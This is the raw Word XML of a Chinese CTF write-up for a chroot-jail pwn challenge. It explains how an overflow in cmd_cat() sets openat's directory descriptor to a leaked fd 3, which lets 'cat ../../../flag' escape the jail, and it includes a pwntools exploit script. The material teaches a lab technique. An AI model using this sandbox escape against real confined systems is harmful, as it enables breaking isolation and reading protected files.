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忍术我设了一个笼-writeup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🥷 忍术：我设了一个笼 writeup</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="背景"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">背景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">从pwn.college上接触到的沙箱类型，感觉很有意思，便出了一道简单的pwn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本来想结合最近的CVE-2025-32463，但是感觉太刻意了，而且很麻烦</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="26" w:name="答案"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">答案</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="本地"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本地</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jail.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">里的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">binary_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">改为编译出来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">文件的路径，并设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">local = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">运行</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="25" w:name="远程"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">远程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jail.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">里的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip, port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">设置为题目的IP与端口，并设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">local = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">运行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./sh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32" w:name="解析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">解析</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="29" w:name="原理"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本题目提供了一个由chroot创造的沙箱(sandbox)环境，详见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">man chroot.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">man chroot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，具体原理有兴趣的可以了解一下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">chroot环境的沙箱逃逸技术有很多种，基本的方法参见</w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">此处</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">，而且已经有人收集并整合为一个提权程序，</w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">参见此处</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">该题目使用的方法是依托进入沙箱之前的未关闭的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">在沙箱目录外</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的目录文件描述符(file descriptor)来协助逃逸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">之后可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execveat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">linkat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">等以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">结尾的系统调用来访问/执行沙箱目录外的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">方法是将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第一个参数设置为该未关闭的文件描述符</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，例如: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chroot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"./jail"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chdir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...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flag_fd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It point to ./../../flag, not ./jail/../../flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">原理是这类系统调用第一个参数总是一个文件描述符，当文件名为相对位置时会以第一个参数的位置为当前的目录，具体详见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">man openat.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">本题目便提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数（为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">系统调用的简单wrap），并且第一个参数可以通过变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的溢出所控制，从而能穿越路径，达成逃逸</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="漏洞利用"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">初始化时变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AT_FDCWD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(-100)，意味着以当前目录为参照，在IDA可以看出正好在变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">之后</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在一开始的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">banner()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数中引入了一个未关闭的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">指向沙箱外目录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的文件描述符，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">号文件描述符一般分别对应着标准输入，标准输出和标准错误流，该文件描述符会分配到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd_cat()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">函数为漏洞函数，它会强制将输入的文件名转为相对路径，却导致了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">因此，我们可以溢出控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">变量为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，再输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat ../../../flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，从而路径穿越到沙箱外的根目录取得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="exp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exp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pwn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context(arch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"amd64"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, os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"linux"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, 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context.terminal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"tmux"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binary_path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"../src/jail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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ROP(binary_path)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">elf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ELF(binary_path)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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ip,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process(binary_path)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dbg(p):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gdb.attach(p)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remote(ip, port)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dbg(_):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ls(addr):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log.success(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(addr))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recv(char):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u64(p.recvuntil(char, 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).ljust(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=================start=================#</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dbg(p)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b"cat "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payload.ljust(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x200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\x03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p.sendafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"$ "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload)</w:t>
      </w:r>
      <w:r>
        <w:br/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b'cat ../../../flag'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"$ "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p.interactive()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8" Target="https://github.com/earthquake/chw00t" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://pwn.college/system-security/sandboxin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github.com/earthquake/chw00t" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://pwn.college/system-security/sandboxin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2025-09-01T18:17:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-01T18:17:21Z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